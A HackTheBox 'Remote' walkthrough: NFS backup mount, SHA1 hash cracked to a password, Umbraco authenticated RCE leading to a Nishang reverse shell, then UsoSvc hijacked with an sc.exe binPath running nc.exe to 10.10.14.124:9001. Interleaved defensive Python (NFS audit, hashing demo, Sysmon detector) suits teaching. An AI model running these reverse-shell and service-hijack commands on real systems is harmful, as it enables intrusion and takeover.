Remote HackTheBox Walkthrough
Hello guys, the HackTheBox team has retired Remote, meaning I am allowed to release a walkthrough on how I solved the box. The box was really fun for me and it showed the importance of doing recon properly. First you find a website running Umbraco CMS (Content Management System), and that specific version is vulnerable to an authenticated remote code execution vulnerability, meaning that to exploit it you need valid credentials, which we don't have. Some people might have gone down the rabbit hole of brute forcing the login page if they didn't do their enumeration correctly, but if you did your enumeration correctly and ran a full port scan you realized that an extra port was open and it was running NFS: mount the share, do some magic, get credentials and use an exploit to get a shell on the box. I am going to be doing it manually using Burp Suite, and we are also going to tweak the exploit script a bit to give it more functionality, like seeing the command output. After getting a shell on the box you find we have write access to a service called UsoSvc; edit the service and get admin privileges on the box. It was a really fun box, so without much more to say, let's jump in
As always we are going to start off with an nmap scan of the box to find the services that are running
Looking at the nmap scan results we have a few ports open
First we see that FTP has anonymous login allowed, let's see what we can get off of it
Doing a directory listing we see that it really has nothing useful. Next I decided to enumerate HTTP. Opening the webpage using Mozilla we see a standard webpage and it appears to be a content management system
Scrolling through the webpages we see it's an Umbraco instance. I decided to click around and see if I could find anything meaningful, and one thing stood out
The way a URL parameter was used to call the webpages to be displayed
I decided to test for LFI (Local File Inclusion) but I didn't get anything meaningful. After a short time I decided to just keep it in mind and revisit it if I got stuck.
Next I decided to do directory brute forcing using gobuster and a targeted wordlist found in SecLists. Gobuster is a directory/file and DNS busting tool written in Go; it's used to brute-force URIs, including directories and files, as well as DNS subdomains
Looking at the result we see that we have a few directories coming back, so let's take a look at one of them
/umbraco redirects us to a login page but we don't have any credentials
Next I decided to try some obvious credentials on the login page, such as:
1. admin@remote.htb:admin
2. admin@remote.htb:password
3. guest@remote.htb:guest
But I always got a login failure
But going back to our nmap scan we see that SMB was enabled, so I decided to check whether guest authentication was allowed using both smbclient and smbmap. These are Linux tools designed to interact with Samba shares
But looking at the above screenshot I got an authentication error. Now I had hit a dead end, so I decided to do a full port scan and see if I might have missed anything
Looking at the full port scan result we see port 2049 is open, which runs NFS
I decided to see what shares were accessible to us using the showmount command in Linux
Looking at the results we see that we have access to the site_backups share, since as you can see it's accessible to everyone
I decided to mount the share so that I could have a look at the files
First I made a directory called mount
Next I mounted the share using the command below
sudo mount -t nfs -o vers=2 10.10.10.180:/site_backups $(pwd)/mount
Doing a directory listing we see all the files and it looks like the Umbraco CMS site backup. Sweet!!!!
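The showmount result above is exactly the condition a defender should be auditing for on the server side. Below is an added example (my own code, not from the page or from any tool named on it) that parses exports(5) entries and `showmount -e` output and flags exports open to every host, writable by every host, or carrying no_root_squash or insecure; the exports file and the showmount output are constructed samples, with the first entry modelled on the site_backups share from the page.

```python
import re

# Constructed sample /etc/exports. The first entry mirrors the share on the page:
# showmount listed /site_backups as "(everyone)", i.e. a wildcard client entry.
SAMPLE_EXPORTS = """\
# CMS site backups (constructed sample)
/site_backups   *(rw,sync,no_root_squash)
/srv/data       10.10.10.0/24(ro,sync,root_squash)
/srv/scratch    10.10.10.5(rw,sync) *(ro,insecure)
"""

# Constructed `showmount -e` output in the format the page's enumeration step produced.
SAMPLE_SHOWMOUNT = """\
Export list for 10.10.10.180:
/site_backups (everyone)
/srv/data     10.10.10.0/24
"""

WORLD_HOSTS = {"*", "0.0.0.0/0"}
ENTRY_RE = re.compile(r"^([^(]*)(?:\(([^)]*)\))?$")  # client(opt,opt) or bare client

def parse_exports(text):
    """Parse exports(5) lines into [(path, [(client, [option, ...]), ...]), ...]."""
    result = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        path, *entries = line.split()
        clients = []
        for entry in entries:
            m = ENTRY_RE.match(entry)
            host, opts = m.group(1), m.group(2) or ""
            clients.append((host or "*", [o for o in opts.split(",") if o]))
        if not entries:
            clients.append(("*", []))  # no client list at all means every host
        result.append((path, clients))
    return result

def audit_exports(text):
    """Return (path, client, [issue, ...]) for every export entry a defender should look at."""
    findings = []
    for path, clients in parse_exports(text):
        for host, opts in clients:
            issues = []
            world = host in WORLD_HOSTS
            if world:
                issues.append("exported to every host")
            if world and "rw" in opts:
                issues.append("world-writable")
            if "no_root_squash" in opts:
                issues.append("no_root_squash: a remote root keeps uid 0 on the share")
            if "insecure" in opts:
                issues.append("insecure: clients may connect from unprivileged ports")
            if issues:
                findings.append((path, host, issues))
    return findings

def showmount_everyone(text):
    """Return the exports that `showmount -e` reports as open to (everyone)."""
    open_exports = []
    for line in text.splitlines()[1:]:  # line 0 is "Export list for <host>:"
        parts = line.split(None, 1)
        if len(parts) == 2 and parts[1].strip() == "(everyone)":
            open_exports.append(parts[0])
    return open_exports

if __name__ == "__main__":
    for path, host, issues in audit_exports(SAMPLE_EXPORTS):
        print(f"{path} {host}: {'; '.join(issues)}")
    print("open to everyone per showmount:", showmount_everyone(SAMPLE_SHOWMOUNT))
```

Run against a real /etc/exports, anything reported as exported to every host is reachable by exactly the unauthenticated mount shown on this page; restricting the client list to the hosts that need the backup, and keeping root_squash, is the fix.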
All the user information is stored in the App_Data directory, so I decided to navigate to it since user information almost always includes credentials
The file that really stood out to me was the umbraco.sdf file, since it's a database file; I knew this from looking at Umbraco forums
I decided to copy it to my box and then ran strings against it and found really useful information. We have a bunch of emails. This is possible because the database is not encrypted
Looking at the above screenshot we see a couple of potential emails
1. admin@htb.local
2. smith@htb.local
Also running the head command on that same umbraco.sdf file we see a string which looks like a SHA1 hash
b8be16afba8c314ad33d812f22a04991b90e2aaa
So I decided to copy it to my local box and see if I could crack the hash using hashcat
But first I tried to identify exactly what type of hash it could possibly be using hash-identifier. I had made an educated guess that it could be a SHA1 hash since it was 40 characters long
hash-identifier identified it as a SHA1 hash, and that is mode 100 when we look at the hashcat --example-hashes output
Let's get cracking with hashcat
My laptop specs are low but after about 30 seconds the hash was cracked
As you can see in the above image the password is
baconandcheese
Now we have one valid credential
admin@htb.local:baconandcheese
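The hash came out of a backup that anyone on the network could mount, and it was an unsalted SHA1, so one digest per wordlist entry is the whole cost of the attack the page describes. As an added example (not the page's or the author's code), the Python below reproduces the length heuristic hash-identifier applies and the wordlist check hashcat mode 100 performs, then shows what a per-user salt and a slow KDF (PBKDF2 here, with illustrative parameters) do to the same check; the wordlist is a constructed stand-in for rockyou.txt.

```python
import hashlib
import hmac
import os

# The SHA1 hash recovered from umbraco.sdf on the page; the page reports that
# hashcat mode 100 (raw SHA1) cracks it to "baconandcheese".
PAGE_HASH = "b8be16afba8c314ad33d812f22a04991b90e2aaa"

# Constructed stand-in for rockyou.txt.
WORDLIST = ["password", "admin", "letmein", "baconandcheese", "Summer2020"]

# Digest length in hex characters -> candidate unsalted algorithms. This is the
# same educated guess hash-identifier makes: 40 hex characters points at SHA1.
LENGTH_TO_ALGOS = {32: ["md5"], 40: ["sha1"], 64: ["sha256"], 128: ["sha512"]}

def identify(hexdigest_str):
    """Candidate algorithms for a bare hex digest, judged by its length."""
    h = hexdigest_str.strip().lower()
    if not h or any(c not in "0123456789abcdef" for c in h):
        return []
    return LENGTH_TO_ALGOS.get(len(h), [])

def hexdigest(algo, word):
    return hashlib.new(algo, word.encode()).hexdigest()

def crack_unsalted(target, wordlist):
    """Unsalted fast hash: one digest per candidate word is the attacker's whole cost."""
    target = target.strip().lower()
    for algo in identify(target):
        for word in wordlist:
            if hexdigest(algo, word) == target:
                return algo, word
    return None

def pbkdf2_record(password, iterations=200_000):
    """How the same password should have been stored: random per-user salt + slow KDF.
    The iteration count is illustrative, not a value taken from the page."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return {"salt": salt.hex(), "iterations": iterations, "hash": dk.hex()}

def verify_pbkdf2(record, candidate):
    dk = hashlib.pbkdf2_hmac("sha256", candidate.encode(),
                             bytes.fromhex(record["salt"]), record["iterations"])
    return hmac.compare_digest(dk.hex(), record["hash"])

if __name__ == "__main__":
    print("candidate algorithms:", identify(PAGE_HASH))
    print("wordlist result:", crack_unsalted(PAGE_HASH, WORDLIST))
    record = pbkdf2_record("baconandcheese")
    # Against this record every guess costs a full PBKDF2 run, and a precomputed
    # table is useless because the salt differs per user.
    print("pbkdf2 verify (correct):", verify_pbkdf2(record, "baconandcheese"))
    print("pbkdf2 verify (wrong):  ", verify_pbkdf2(record, "password"))
```

The defender's takeaways are the two things the script contrasts: a credential store that lands in an openly mountable backup is a breach on its own, and an unsalted fast hash turns that breach into a password within seconds, as the author's 30 second hashcat run shows.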
Let's go back to the Umbraco login page and see if we can log in to the CMS
After filling in the details and clicking the login button
We get logged in immediately
My next instinct was to try and determine the exact version of Umbraco running
Pressing the help button we get to see the exact version of Umbraco running, which is
Version: 7.12.4
Next I decided to run searchsploit since I knew the box was centered around an exploit. Searchsploit is a tool for searching a local database of public exploits for various software
Looking at the output of searchsploit we see that our exact version is vulnerable to an authenticated remote code execution vulnerability
So I copied the exploit to my working directory
Then I executed the script and got a bunch of errors
So I decided to debug the script, which was easy in my opinion, and got it to work
But we are not getting any output, just a message saying start and end
But let's try to explain the exploit a bit, specifically the XSLT payload
From the above screenshot you can see that proc.StartInfo.FileName will call the executable, and the arguments you pass to the executable are defined in proc.StartInfo.Arguments. Sweet!!!
Now I decided to see if I could add a bit more spice to the exploit and allow us to execute commands from the terminal, since this vulnerability is not a blind remote code execution vulnerability, meaning we get output. The problem is that the output of the command we ran is buried in the noise. So I messed with the script a bit more and the results are as you see below
As you can see above we can execute multiple commands without actually having to interact with the source code of the application. I just imported the regular expression module and it did the trick: it filtered the noise out and returned only the output of the command we were running. Now that we have a way to execute code on the system, let's get a shell on the box using the Nishang reverse shells
I copied the Nishang reverse shell to my current working directory
Then I edited the IP address and port to connect to by adding the following one line at the bottom of the script
Next I hosted a simple HTTP server; this will allow the shell to be downloaded from our box and, when executed, it will give us a reverse shell
Next I set up a netcat listener on port 9001, the same port we had specified in the PowerShell reverse shell
Next I executed the PowerShell command that would download the PowerShell reverse shell and execute it
After executing the script, going back to the server we see that the reverse shell had been downloaded
And going back to the netcat listener we had a shell on the box
Sweet now we are on the box.
Now let's go back a little bit and get code execution using Burp Suite, since that's how I did it the first time I did the box
First we have to log in to the content management system (CMS)
Next we have to navigate to the vulnerable URL
Next I clicked visualize XSLT and intercepted the request using Burp Suite
Next I sent the request to the Repeater tab
And I went back and analyzed the Python exploit source code
The payload is defined in a variable, meaning it is used somewhere else in the script
I continued analyzing the script
And found where the variable was referenced
The payload was used in a POST parameter called
xsltSelection
Next I added the payload in the same spot in my Repeater request
Looking at the payload, it will call powershell.exe and then execute a ping command which will ping my box
Before executing the request I set up a netcat listener
Then I sent the request, and going back to my tcpdump listener you can see that I got a callback
And looking at the output of the request we see that the command output is also shown
This is what made me modify the script, since I could get the output of the command
Now you can use the same method to get a shell on the box using Burp Suite; I just used ping as a proof of concept (POC)
But enough of that, let's get back to doing the box
We already got a shell
Going to the Public user's folder we have the user.txt flag
Now you can submit it to HackTheBox to show you have completed the user challenge
Now we have to escalate to root on the box. I decided to run a script called PowerUp which automatically checks for privilege escalation vectors
First I downloaded PowerUp to the box
To execute the script I used the command
Invoke-AllChecks
I let the program run until it had finished and then went through the output
One piece of information really stood out
We can start and stop the UsoSvc service and we can also edit its configuration
And what's even better is that PowerUp was kind enough to give us a command to run; this will allow us to escalate our privileges
On running the command we are given another command we are supposed to run
On running that command it will create a new user called john and the user will have admin privileges
But I opted against this method of creating a new user on the box and decided to upload a netcat reverse shell to the box using the script I had customized
First I set up a web server
Next I used Invoke-WebRequest, a PowerShell one-liner, to download netcat onto the box
Next I edited the UsoSvc service. This vulnerability is actually a CVE, and PayloadsAllTheThings has a good article on how to exploit the service
After I had downloaded the netcat reverse shell I stopped the service first, before editing it, using the command
sc.exe stop UsoSvc
Next I edited the service and tricked it into thinking that the binary path for the program was the netcat reverse shell I had downloaded onto the box
The command that I used was
sc.exe config usosvc binPath="C:\users\public\nc.exe 10.10.14.124 9001 -e cmd"
And as you can see from the above screenshot the service configuration has been changed successfully
Now I queried the service again to make sure that the changes had been applied
As you can see the binary path has been changed successfully
Next I set up a netcat listener using the same port I had specified in the UsoSvc service config
Then I started the service again using the command
sc.exe start UsoSvc
And going back to my netcat listener we had a shell as Administrator on the box
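The PowerUp finding and the sc.exe config change that follows come down to one thing a defender can watch: the ImagePath value of a service being rewritten to point at something like C:\users\public\nc.exe. As an added example (not the page's code, and not PowerUp's), the Python below runs that check over constructed records shaped like Sysmon Event ID 13 (registry value set) entries, flagging service image paths outside the Windows and Program Files directories or carrying netcat/PowerShell-style command lines; the record shape is a simplified dict rather than real Sysmon XML, the user names are made up, and the service names other than UsoSvc are invented.

```python
import re

# Constructed records shaped like Sysmon Event ID 13 (RegistryEvent: value set).
# The first one carries the binPath the page set on UsoSvc with sc.exe config.
SAMPLE_EVENTS = [
    {"EventID": 13, "User": r"CONSTRUCTED\webapp",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\UsoSvc\ImagePath",
     "Details": r"C:\users\public\nc.exe 10.10.14.124 9001 -e cmd"},
    {"EventID": 13, "User": r"NT AUTHORITY\SYSTEM",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\UsoSvc\ImagePath",
     "Details": r"%SystemRoot%\system32\svchost.exe -k netsvcs -p"},
    {"EventID": 13, "User": r"NT AUTHORITY\SYSTEM",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\UsoSvc\Start",
     "Details": "DWORD (0x00000002)"},
    {"EventID": 13, "User": r"CONSTRUCTED\installer",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\VendorAgent\ImagePath",
     "Details": r'"C:\Program Files\Vendor\agent.exe" --service'},
    {"EventID": 13, "User": r"CONSTRUCTED\webapp",
     "TargetObject": r"HKLM\System\CurrentControlSet\Services\ConstructedSvc\ImagePath",
     "Details": r"C:\Windows\System32\cmd.exe /c powershell -nop -w hidden"},
]

# Registry path of a service's ImagePath value, capturing the service name.
IMAGEPATH_RE = re.compile(
    r"^HKLM\\System\\CurrentControlSet\\Services\\([^\\]+)\\ImagePath$", re.IGNORECASE)

# Directories a legitimate service binary is expected to live under (lower-cased).
TRUSTED_PREFIXES = (
    "c:\\windows\\", "%systemroot%\\", "c:\\program files\\", "c:\\program files (x86)\\")

# Command-line fragments that have no business in a service image path.
SUSPICIOUS_TOKENS = ("nc.exe", "nc64.exe", "ncat", "powershell", "-e cmd")

def executable_of(command_line):
    """First token of a service command line, honouring a quoted executable path."""
    s = command_line.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[1:end] if end > 0 else s[1:]
    return s.split()[0] if s else ""

def assess_event(event):
    """Return an assessment dict for an ImagePath change, or None for anything else."""
    match = IMAGEPATH_RE.match(event.get("TargetObject", ""))
    if event.get("EventID") != 13 or match is None:
        return None
    new_path = event.get("Details", "")
    exe = executable_of(new_path).lower()
    reasons = []
    if not exe.startswith(TRUSTED_PREFIXES):
        reasons.append(f"executable outside trusted directories: {exe}")
    lowered = new_path.lower()
    for token in SUSPICIOUS_TOKENS:
        if token in lowered:
            reasons.append(f"suspicious token in command line: {token}")
    return {"service": match.group(1), "user": event.get("User", ""),
            "new_image_path": new_path, "reasons": reasons}

def suspicious_service_changes(events):
    """Every ImagePath change with at least one reason to look at it."""
    alerts = []
    for event in events:
        assessment = assess_event(event)
        if assessment and assessment["reasons"]:
            alerts.append(assessment)
    return alerts

if __name__ == "__main__":
    for alert in suspicious_service_changes(SAMPLE_EVENTS):
        print(f"[ALERT] {alert['service']} changed by {alert['user']}: {alert['new_image_path']}")
        for reason in alert["reasons"]:
            print("   -", reason)
```

Two practical notes. Sysmon only emits Event 13 for keys its configuration covers, so a rule matching `\Services\` and `\ImagePath` is needed before this detector sees anything. And the misconfiguration itself is visible before any change happens: `sc.exe sdshow UsoSvc` prints the service DACL, and a non-administrative principal holding DC (SERVICE_CHANGE_CONFIG) together with start/stop rights is exactly what PowerUp reported here; removing that grant is the fix.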
Navigating to the Administrator's Desktop folder we have the root flag and we can view it
And the box is pretty much done. That was fun and I actually liked it since the scenario is somewhat realistic; I also loved modifying the script
As I always say, coding is FUN and with practice you get good at it
I haven't really gone into detail on the exploit development part (how I modified the Python script and the lines of code I added) but in the coming week I might release a 3 minute writeup on how I modified the script. That's it for now folks, till next time, goodbye
If you liked the walkthrough you can clap for me down below and follow me so that you don't miss any upcoming articles